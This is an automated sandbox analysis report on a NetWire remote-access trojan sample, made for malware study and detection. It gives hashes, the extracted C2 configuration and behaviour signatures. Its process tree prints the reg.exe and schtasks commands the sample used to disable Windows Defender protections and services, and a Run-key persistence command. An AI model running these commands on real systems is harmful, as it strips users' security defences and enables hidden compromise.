Analysis

  • max time kernel
    120s
  • max time network
    195s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    19-07-2021 22:05

General

  • Target

    24C8B4647F7CDEF7524055129030454F.exe

  • Size

    23.0MB

  • MD5

    24c8b4647f7cdef7524055129030454f

  • SHA1

    8b5dd2f2d271b5503a865bd6641e7a761ee9c520

  • SHA256

    b7f42f93e5c2dfcb4620859c74593f1090dcca50dbf14d7665e31832b3ff0313

  • SHA512

    1316e79aac01b0a46f7dc389970f7c3e804898c47020d987c80783b56a7b61fdc184979012e96b55cd74dedb36669a1064c9198be8a79b1ac74b68d730cb762d

Malware Config

Extracted

Family

netwire

C2

maelus.mine.nu:3650

Attributes
  • activex_autorun

    false

  • activex_key

  • copy_executable

    false

  • delete_original

    false

  • host_id

    first spread

  • install_path

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • mutex

  • offline_keylogger

    true

  • password

    0000

  • registry_autorun

    false

  • startup_name

  • use_mutex

    false

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • NetWire RAT payload 3 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 18 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 10 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\24C8B4647F7CDEF7524055129030454F.exe
    "C:\Users\Admin\AppData\Local\Temp\24C8B4647F7CDEF7524055129030454F.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
      "C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C957.tmp\C958.tmp\C959.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          4⤵
            PID:772
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            4⤵
              PID:912
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
              4⤵
                PID:832
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                4⤵
                  PID:1372
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                  4⤵
                    PID:744
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1252
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                      4⤵
                        PID:880
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                        4⤵
                          PID:1548
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                          4⤵
                            PID:1132
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            4⤵
                              PID:1080
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                              4⤵
                                PID:660
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                4⤵
                                  PID:1652
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                  4⤵
                                    PID:436
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                    4⤵
                                      PID:1792
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      4⤵
                                        PID:1012
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                        4⤵
                                          PID:1944
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                          4⤵
                                            PID:1344
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                            4⤵
                                              PID:300
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                              4⤵
                                                PID:1260
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                4⤵
                                                  PID:1280
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                  4⤵
                                                    PID:912
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                    4⤵
                                                      PID:1332
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                      4⤵
                                                        PID:1876
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                        4⤵
                                                          PID:568
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                          4⤵
                                                            PID:1628
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                            4⤵
                                                              PID:1272
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                              4⤵
                                                                PID:1252
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                4⤵
                                                                  PID:340
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                  4⤵
                                                                    PID:936
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                    4⤵
                                                                    • Modifies security service
                                                                    PID:876
                                                              • C:\Users\Admin\AppData\Roaming\Hostforced12.exe
                                                                "C:\Users\Admin\AppData\Roaming\Hostforced12.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1692
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Roaming\Hostforced12.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
                                                                  3⤵
                                                                    PID:1492
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
                                                                    3⤵
                                                                    • Loads dropped DLL
                                                                    PID:960
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1772
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "azertgf" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
                                                                        5⤵
                                                                          PID:744
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "azertgf" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
                                                                            6⤵
                                                                            • Adds Run key to start application
                                                                            PID:768
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"
                                                                          5⤵
                                                                            PID:1088
                                                                    • C:\Users\Admin\AppData\Roaming\nb672-full.exe
                                                                      "C:\Users\Admin\AppData\Roaming\nb672-full.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks processor information in registry
                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                      PID:1444

                                                                  Network

                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                  Persistence

                                                                  Modify Existing Service

                                                                  2
                                                                  T1031

                                                                  Registry Run Keys / Startup Folder

                                                                  1
                                                                  T1060

                                                                  Defense Evasion

                                                                  Modify Registry

                                                                  3
                                                                  T1112

                                                                  Disabling Security Tools

                                                                  1
                                                                  T1089

                                                                  Discovery

                                                                  System Information Discovery

                                                                  2
                                                                  T1082

                                                                  Query Registry

                                                                  1
                                                                  T1012

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Users\Admin\AppData\Local\Temp\C957.tmp\C958.tmp\C959.bat
                                                                    MD5

                                                                    665f21a9b6730aa08e62473e481b8c55

                                                                    SHA1

                                                                    717d52e75ac16bf032299828dd61c86af281eb43

                                                                    SHA256

                                                                    dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579

                                                                    SHA512

                                                                    b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

                                                                  • C:\Users\Admin\AppData\Roaming\Hostforced12.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • C:\Users\Admin\AppData\Roaming\Hostforced12.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
                                                                    MD5

                                                                    9684ab1ebcc8844fbbffd54b3b8e5db1

                                                                    SHA1

                                                                    1fbbca3f9e063ce98cde453e1b820e056a524771

                                                                    SHA256

                                                                    c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

                                                                    SHA512

                                                                    b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

                                                                  • C:\Users\Admin\AppData\Roaming\nb672-full.exe
                                                                    MD5

                                                                    20bb59d1445ba13a2f73fdb880fb0a4d

                                                                    SHA1

                                                                    fc6280efbdc9e200468c989a1456ffae8f524dda

                                                                    SHA256

                                                                    a02b43c90598585d87a1b63d6edcb4da92df5c760465b85d74006445a4aa2eb4

                                                                    SHA512

                                                                    0a50a93e42daae26370eb8dc5fbc0084623407147d2620047d33b715bdf9052e5047799fdf89662c621492d0e4027fe90797e88911524b0cefccbf47ad509414

                                                                  • C:\Users\Admin\AppData\Roaming\nb672-full.exe
                                                                    MD5

                                                                    20bb59d1445ba13a2f73fdb880fb0a4d

                                                                    SHA1

                                                                    fc6280efbdc9e200468c989a1456ffae8f524dda

                                                                    SHA256

                                                                    a02b43c90598585d87a1b63d6edcb4da92df5c760465b85d74006445a4aa2eb4

                                                                    SHA512

                                                                    0a50a93e42daae26370eb8dc5fbc0084623407147d2620047d33b715bdf9052e5047799fdf89662c621492d0e4027fe90797e88911524b0cefccbf47ad509414

                                                                  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\LangDLL.dll
                                                                    MD5

                                                                    91d5e21907e4baff0145339311abf9d9

                                                                    SHA1

                                                                    f867d8529d4f3704cd4f475b46699b66cb6c2002

                                                                    SHA256

                                                                    acde373cc4916be5df3d239ab67f5980c333e979f34965ee733e7c6259586e9b

                                                                    SHA512

                                                                    339e35b89f2ac7d2fbe9dfd9a55279d20463f7c298332810c0ebaa5de95e09657f4b2837904ae16a8743c4c7abf7f3c7581099bc94312c178a21783288790401

                                                                  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\System.dll
                                                                    MD5

                                                                    b8992e497d57001ddf100f9c397fcef5

                                                                    SHA1

                                                                    e26ddf101a2ec5027975d2909306457c6f61cfbd

                                                                    SHA256

                                                                    98bcd1dd88642f4dd36a300c76ebb1ddfbbbc5bfc7e3b6d7435dc6d6e030c13b

                                                                    SHA512

                                                                    8823b1904dccfaf031068102cb1def7958a057f49ff369f0e061f1b4db2090021aa620bb8442a2a6ac9355bb74ee54371dc2599c20dc723755a46ede81533a3c

                                                                  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\UAC.dll
                                                                    MD5

                                                                    4814167aa1c7ec892e84907094646faa

                                                                    SHA1

                                                                    a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee

                                                                    SHA256

                                                                    32dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822

                                                                    SHA512

                                                                    fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067

                                                                  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\UserInfo.dll
                                                                    MD5

                                                                    580c256b9b61a77bc4f513cd0646730d

                                                                    SHA1

                                                                    a4dea0bc275945c29a3fbe1872437267dce0bcb9

                                                                    SHA256

                                                                    6b9c723d71482373ed181097ad0afa59dd88f3b92d43b33436ec048d78308ca3

                                                                    SHA512

                                                                    423ff8579b037917bf835d7fdea4b1302fcd7cd06198f6c0e220631a05de0829229034159ef528afd67725ab93e31f6f293367f84d1de446f32b8fcbac3a0cdd

                                                                  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\UserInfo.dll
                                                                    MD5

                                                                    580c256b9b61a77bc4f513cd0646730d

                                                                    SHA1

                                                                    a4dea0bc275945c29a3fbe1872437267dce0bcb9

                                                                    SHA256

                                                                    6b9c723d71482373ed181097ad0afa59dd88f3b92d43b33436ec048d78308ca3

                                                                    SHA512

                                                                    423ff8579b037917bf835d7fdea4b1302fcd7cd06198f6c0e220631a05de0829229034159ef528afd67725ab93e31f6f293367f84d1de446f32b8fcbac3a0cdd

                                                                  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\cpudesc.dll
                                                                    MD5

                                                                    d25102051b33f61c9f7fb564a4556219

                                                                    SHA1

                                                                    c683964c11d5175171bd009cb08f87592c923f85

                                                                    SHA256

                                                                    e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398

                                                                    SHA512

                                                                    8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

                                                                  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\nsDialogs.dll
                                                                    MD5

                                                                    70d4c5f9acc5ddf934b73fa311ade7d8

                                                                    SHA1

                                                                    6962e84782b0e1fe798cdce1d7447211228ca85b

                                                                    SHA256

                                                                    02869b76936e3c3102bb36e34b41bc989770bf81dca09f31c561bb6be52285ee

                                                                    SHA512

                                                                    40189b463173cbbad9c5101f37b4a37d970e9cd8e6f3d343cb8e54c54bdc7fdc3cfa8d7d7e7b7b0241c68768607c523be2c2c21b7efc727257731e1c5d1673fc

                                                                  • \Users\Admin\AppData\Roaming\Hostforced12.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • \Users\Admin\AppData\Roaming\Hostforced12.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • \Users\Admin\AppData\Roaming\Hostforced12.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • \Users\Admin\AppData\Roaming\Hostforced12.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe
                                                                    MD5

                                                                    0dd48d2486589ef25c25b5971a6736b4

                                                                    SHA1

                                                                    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39

                                                                    SHA256

                                                                    05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42

                                                                    SHA512

                                                                    0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

                                                                  • \Users\Admin\AppData\Roaming\WinDriversQt.exe
                                                                    MD5

                                                                    9684ab1ebcc8844fbbffd54b3b8e5db1

                                                                    SHA1

                                                                    1fbbca3f9e063ce98cde453e1b820e056a524771

                                                                    SHA256

                                                                    c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

                                                                    SHA512

                                                                    b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

                                                                  • \Users\Admin\AppData\Roaming\WinDriversQt.exe
                                                                    MD5

                                                                    9684ab1ebcc8844fbbffd54b3b8e5db1

                                                                    SHA1

                                                                    1fbbca3f9e063ce98cde453e1b820e056a524771

                                                                    SHA256

                                                                    c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

                                                                    SHA512

                                                                    b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

                                                                  • \Users\Admin\AppData\Roaming\WinDriversQt.exe
                                                                    MD5

                                                                    9684ab1ebcc8844fbbffd54b3b8e5db1

                                                                    SHA1

                                                                    1fbbca3f9e063ce98cde453e1b820e056a524771

                                                                    SHA256

                                                                    c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec

                                                                    SHA512

                                                                    b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

                                                                  • \Users\Admin\AppData\Roaming\nb672-full.exe
                                                                    MD5

                                                                    20bb59d1445ba13a2f73fdb880fb0a4d

                                                                    SHA1

                                                                    fc6280efbdc9e200468c989a1456ffae8f524dda

                                                                    SHA256

                                                                    a02b43c90598585d87a1b63d6edcb4da92df5c760465b85d74006445a4aa2eb4

                                                                    SHA512

                                                                    0a50a93e42daae26370eb8dc5fbc0084623407147d2620047d33b715bdf9052e5047799fdf89662c621492d0e4027fe90797e88911524b0cefccbf47ad509414

                                                                  • \Users\Admin\AppData\Roaming\nb672-full.exe
                                                                    MD5

                                                                    20bb59d1445ba13a2f73fdb880fb0a4d

                                                                    SHA1

                                                                    fc6280efbdc9e200468c989a1456ffae8f524dda

                                                                    SHA256

                                                                    a02b43c90598585d87a1b63d6edcb4da92df5c760465b85d74006445a4aa2eb4

                                                                    SHA512

                                                                    0a50a93e42daae26370eb8dc5fbc0084623407147d2620047d33b715bdf9052e5047799fdf89662c621492d0e4027fe90797e88911524b0cefccbf47ad509414

                                                                  • \Users\Admin\AppData\Roaming\nb672-full.exe
                                                                    MD5

                                                                    20bb59d1445ba13a2f73fdb880fb0a4d

                                                                    SHA1

                                                                    fc6280efbdc9e200468c989a1456ffae8f524dda

                                                                    SHA256

                                                                    a02b43c90598585d87a1b63d6edcb4da92df5c760465b85d74006445a4aa2eb4

                                                                    SHA512

                                                                    0a50a93e42daae26370eb8dc5fbc0084623407147d2620047d33b715bdf9052e5047799fdf89662c621492d0e4027fe90797e88911524b0cefccbf47ad509414

                                                                  • memory/300-106-0x0000000000000000-mapping.dmp
                                                                  • memory/340-119-0x0000000000000000-mapping.dmp
                                                                  • memory/436-101-0x0000000000000000-mapping.dmp
                                                                  • memory/568-115-0x0000000000000000-mapping.dmp
                                                                  • memory/660-99-0x0000000000000000-mapping.dmp
                                                                  • memory/744-87-0x0000000000000000-mapping.dmp
                                                                  • memory/744-135-0x0000000000000000-mapping.dmp
                                                                  • memory/768-136-0x0000000000000000-mapping.dmp
                                                                  • memory/772-81-0x0000000000000000-mapping.dmp
                                                                  • memory/832-85-0x0000000000000000-mapping.dmp
                                                                  • memory/876-121-0x0000000000000000-mapping.dmp
                                                                  • memory/880-90-0x0000000000000000-mapping.dmp
                                                                  • memory/912-82-0x0000000000000000-mapping.dmp
                                                                  • memory/912-112-0x0000000000000000-mapping.dmp
                                                                  • memory/936-120-0x0000000000000000-mapping.dmp
                                                                  • memory/960-125-0x0000000000000000-mapping.dmp
                                                                  • memory/1012-103-0x0000000000000000-mapping.dmp
                                                                  • memory/1028-59-0x0000000075591000-0x0000000075593000-memory.dmp
                                                                    Filesize

                                                                    8KB

                                                                  • memory/1080-98-0x0000000000000000-mapping.dmp
                                                                  • memory/1088-138-0x0000000000400000-0x0000000000425000-memory.dmp
                                                                    Filesize

                                                                    148KB

                                                                  • memory/1088-141-0x0000000000400000-0x0000000000425000-memory.dmp
                                                                    Filesize

                                                                    148KB

                                                                  • memory/1088-139-0x0000000000402570-mapping.dmp
                                                                  • memory/1132-96-0x0000000000000000-mapping.dmp
                                                                  • memory/1252-89-0x0000000000000000-mapping.dmp
                                                                  • memory/1252-118-0x0000000000000000-mapping.dmp
                                                                  • memory/1260-108-0x0000000000000000-mapping.dmp
                                                                  • memory/1272-117-0x0000000000000000-mapping.dmp
                                                                  • memory/1280-109-0x0000000000000000-mapping.dmp
                                                                  • memory/1332-113-0x0000000000000000-mapping.dmp
                                                                  • memory/1344-105-0x0000000000000000-mapping.dmp
                                                                  • memory/1372-86-0x0000000000000000-mapping.dmp
                                                                  • memory/1444-76-0x0000000000000000-mapping.dmp
                                                                  • memory/1492-124-0x0000000000000000-mapping.dmp
                                                                  • memory/1548-94-0x0000000000000000-mapping.dmp
                                                                  • memory/1576-79-0x0000000000000000-mapping.dmp
                                                                  • memory/1628-116-0x0000000000000000-mapping.dmp
                                                                  • memory/1652-100-0x0000000000000000-mapping.dmp
                                                                  • memory/1692-107-0x0000000000350000-0x0000000000367000-memory.dmp
                                                                    Filesize

                                                                    92KB

                                                                  • memory/1692-111-0x00000000003D0000-0x00000000003EF000-memory.dmp
                                                                    Filesize

                                                                    124KB

                                                                  • memory/1692-110-0x00000000010C0000-0x00000000010C1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1692-83-0x00000000011B0000-0x00000000011B1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1692-69-0x0000000000000000-mapping.dmp
                                                                  • memory/1712-63-0x0000000000000000-mapping.dmp
                                                                  • memory/1772-128-0x0000000000000000-mapping.dmp
                                                                  • memory/1772-130-0x0000000001010000-0x0000000001011000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1772-133-0x0000000004A50000-0x0000000004A51000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1772-137-0x0000000000A70000-0x0000000000A7A000-memory.dmp
                                                                    Filesize

                                                                    40KB

                                                                  • memory/1792-102-0x0000000000000000-mapping.dmp
                                                                  • memory/1876-114-0x0000000000000000-mapping.dmp
                                                                  • memory/1944-104-0x0000000000000000-mapping.dmp